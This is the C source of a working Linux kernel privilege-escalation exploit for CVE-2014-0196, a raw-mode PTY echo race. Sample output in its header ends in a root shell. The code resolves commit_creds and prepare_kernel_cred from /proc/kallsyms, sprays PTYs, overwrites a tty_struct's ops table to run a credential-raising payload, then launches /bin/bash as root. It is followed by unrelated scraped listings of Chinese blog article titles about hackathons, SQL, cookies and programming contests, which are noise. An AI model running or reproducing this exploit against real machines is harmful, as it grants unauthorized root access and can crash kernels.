/*

 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

 * condition

 *

 * Slightly-less-than-POC privilege escalation exploit

 * For kernels >= v3.14-rc1

 *

 * Matthew Daley <mattd@bugfuzz.com>

 *

 * Usage:

 *   $ gcc cve-2014-0196-md.c -lutil -lpthread

 *   $ ./a.out

 *   [+] Resolving symbols

 *   [+] Resolved commit_creds: 0xffffffff81056694

 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7

 *   [+] Doing once-off allocations

 *   [+] Attempting to overflow into a tty_struct...............

 *   [+] Got it :)

 *   # id

 *   uid=0(root) gid=0(root) groups=0(root)

 *

 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4

 * chance that the overflow will go off the end of a slab. This does not

 * necessarily lead to an immediate kernel crash, but you should be prepared

 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be

 * avoidable by reading /proc/slabinfo on systems where it is still available

 * to unprivileged users.

 *

 * Caveat: The vulnerability should be exploitable all the way from

 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in

 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer

 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this

 * exploit relies on.

 *

 * Thanks to Jon Oberheide for his help on exploitation technique.

 */

#include <sys/stat.h>

#include <sys/types.h>

#include <fcntl.h>

#include <pthread.h>

#include <pty.h>

#include <stdio.h>

#include <string.h>

#include <termios.h>

#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200

#define RUN_ALLOCS    30

struct device;

struct tty_driver;

struct tty_operations;

typedef struct {

	int counter;

} atomic_t;

struct kref {

	atomic_t refcount;

};

struct tty_struct_header {

	int	magic;

	struct kref kref;

	struct device *dev;

	struct tty_driver *driver;

	const struct tty_operations *ops;

} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;

char buf[1024] = {0};

commit_creds_fn commit_creds;

prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {

	commit_creds(prepare_kernel_cred(0));

	return 0;

}

unsigned long get_symbol(char *target_name) {

	FILE *f;

	unsigned long addr;

	char dummy;

	char name[256];

	int ret = 0;

	f = fopen("/proc/kallsyms", "r");

	if (f == NULL)

		return 0;

	while (ret != EOF) {

		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);

		if (ret == 0) {

			fscanf(f, "%s\n", name);

			continue;

		}

		if (!strcmp(name, target_name)) {

			printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

			fclose(f);

			return addr;

		}

	}

	printf("[-] Couldn't resolve \"%s\"\n", name);

	fclose(f);

	return 0;

}

void *overwrite_thread_fn(void *p) {

	write(slave_fd, buf, 511);

	write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));

	write(slave_fd, &overwrite, sizeof(overwrite));

}

int main() {

	char scratch[1024] = {0};

	void *tty_operations[64];

	int i, temp_fd_1, temp_fd_2;

	for (i = 0; i < 64; ++i)

		tty_operations[i] = payload;

	overwrite.magic                 = TTY_MAGIC;

	overwrite.kref.refcount.counter = 0x1337;

	overwrite.dev                   = (struct device *)scratch;

	overwrite.driver                = (struct tty_driver *)scratch;

	overwrite.ops                   = (struct tty_operations *)tty_operations;

	puts("[+] Resolving symbols");

	commit_creds = (commit_creds_fn)get_symbol("commit_creds");

	prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");

	if (!commit_creds || !prepare_kernel_cred)

		return 1;

	puts("[+] Doing once-off allocations");

	for (i = 0; i < ONEOFF_ALLOCS; ++i)

		if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {

			puts("[-] pty creation failed");

			return 1;

		}

	printf("[+] Attempting to overflow into a tty_struct...");

	fflush(stdout);

	for (i = 0; ; ++i) {

		struct termios t;

		int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;

		pthread_t overwrite_thread;

		if (!(i & 0xfff)) {

			putchar('.');

			fflush(stdout);

		}

		if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {

			puts("\n[-] pty creation failed");

			return 1;

		}

		for (j = 0; j < RUN_ALLOCS; ++j)

			if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {

				puts("\n[-] pty creation failed");

				return 1;

			}

		close(fds[RUN_ALLOCS / 2]);

		close(fds2[RUN_ALLOCS / 2]);

		write(slave_fd, buf, 1);

		tcgetattr(master_fd, &t);

		t.c_oflag &= ~OPOST;

		t.c_lflag |= ECHO;

		tcsetattr(master_fd, TCSANOW, &t);

		if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {

			puts("\n[-] Overwrite thread creation failed");

			return 1;

		}

		write(master_fd, "A", 1);

		pthread_join(overwrite_thread, NULL);

		for (j = 0; j < RUN_ALLOCS; ++j) {

			if (j == RUN_ALLOCS / 2)

				continue;

			ioctl(fds[j], 0xdeadbeef);

			ioctl(fds2[j], 0xdeadbeef);

			close(fds[j]);

			close(fds2[j]);

		}

		ioctl(master_fd, 0xdeadbeef);

		ioctl(slave_fd, 0xdeadbeef);

		close(master_fd);

		close(slave_fd);

		if (!setresuid(0, 0, 0)) {

			setresgid(0, 0, 0);

			puts("\n[+] Got it :)");

			execl("/bin/bash", "/bin/bash", NULL);

		}

	}

}

CVE-2014-0196(马拉松赛跑bug)的更多相关文章

  1. SegmentFault 2014黑客马拉松 北京 作品demo

    1号作品展示——最熟悉的陌生人 app 利用录音(声纹识别)和照片来让好久不见的见面变得不那么尴尬. 2号作品展示——神奇魔镜 app 灵感来自通话<白雪公主>,穿越到今天的“魔镜”功能依 ...

  2. 洛谷P3113 [USACO14DEC]马拉松赛跑Marathon_Gold 线段树维护区间最大值 模板

    如此之裸- Code: #include<cstdio> #include<cstring> #include<cmath> #include<algorit ...

  3. 【独家】K8S漏洞报告 | 近期bug fix解读

    安全漏洞CVE-2019-3874分析 Kubernetes近期重要bug fix分析 Kubernetes v1.13.5 bug fix数据分析 ——本周更新内容 安全漏洞CVE-2019-387 ...

  4. Bash漏洞批量检测工具与修复方案

    &amp;amp;lt;img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" t ...

  5. Daily record-August

    August11. A guide dog can guide a blind person. 导盲犬能给盲人引路.2. A guide dog is a dog especially trained ...

  6. 你真的会玩SQL吗?表表达式,排名函数

    你真的会玩SQL吗?系列目录 你真的会玩SQL吗?之逻辑查询处理阶段 你真的会玩SQL吗?和平大使 内连接.外连接 你真的会玩SQL吗?三范式.数据完整性 你真的会玩SQL吗?查询指定节点及其所有父节 ...

  7. [译]git log进阶

    格式化log输出 oneline --oneline标记将每个commit压缩成一行. 默认情况下显示一个commit ID和commit描述的第一行. 输出如下: 0e25143 Merge bra ...

  8. RFID应用范围

    RFID应用范围 (1)物流: 物流过程中的货物追踪,信息自动采集,仓储应用,港口应用,邮政,快递 (2)零售: 商品的销售数据实时统计,补货,防盗 (3)制造业: 生产数据的实时监控,质量追踪,自动 ...

  9. Android安全研究经验谈

    安全研究做什么 从攻击角度举例,可以是:对某个模块进行漏洞挖掘的方法,对某个漏洞进行利用的技术,通过逆向工程破解程序.解密数据,对系统或应用进行感染.劫持等破坏安全性的攻击技术等. 而防御上则是:查杀 ...

随机推荐

  1. Objective-C中的协议(Protocol)和类别(Category)

    1.什么是协议? 2.协议与类别的声明和使用 1.什么是协议? 在Objective-C中,不支持多继承,即不允许一个类有多个父类,但是OC提供了类似的实现方法,也就是协议.协议有点类似于Java里的 ...

  2. jQuery操作cookie

    验证jquery的cookie插件时才知道原先文件一直在桌面上放着执行发现没有效果,文件必须放在web服务器下面执行才会生效,晕菜! $.cookie(name,value,{expires: 7,p ...

  3. B题(覆盖问题)

        B - B   Time Limit:1000MS     Memory Limit:262144KB     64bit IO Format:%I64d & %I64u   Desc ...

  4. Codeforces Round #313 A Currency System in Geraldion

    A  Currency System in Geraldion Time Limit:2000MS     Memory Limit:262144KB     64bit IO Format:%I64 ...

  5. 省队集训day6 A

    code: #include<cstdio> #include<iostream> #include<cmath> #include<cstring> ...

  6. javasript生成 uuid的几种算法分享

    方式一 function uuid() { var s = []; var hexDigits = "0123456789abcdef"; for (var i = 0; i &l ...

  7. ExtJS5_MVVM特性的简单说明

    下面我们来看一下自动生成的代码中的MVVM架构的关系.Main是一个可视的控件,MainController是这个控件的控制类,MainModel是这个控件的模型类. 在上面的图片中,左边是Main. ...

  8. 信号量 sem_t 进程同步

    sem_t分为有名和无名.有名的sem_t通过sem_open来创建, 而无名的sem_t通过sem_init的初始化. 用有名的sem_t来进程间同步是件很容易的事情,百度上一搜很多想相关的例子. ...

  9. The first time

    早上起来发现昨晚申请的博客开通了,\(^o^)/~纪念下,就像刚打代码学的hello world一样,用c,c++写一个程序纪念下.O(∩_∩)O~哈哈哈哈哈. /*C hello world程序*/ ...

  10. SCALA当的trait

    不是特别懂,但感觉和RUBY当中的MIX-IN功能有几分相似,这又扯到了多重继承及JAVA当中的接口虚拟类了.. package com.hengheng.scala class UseTrait { ...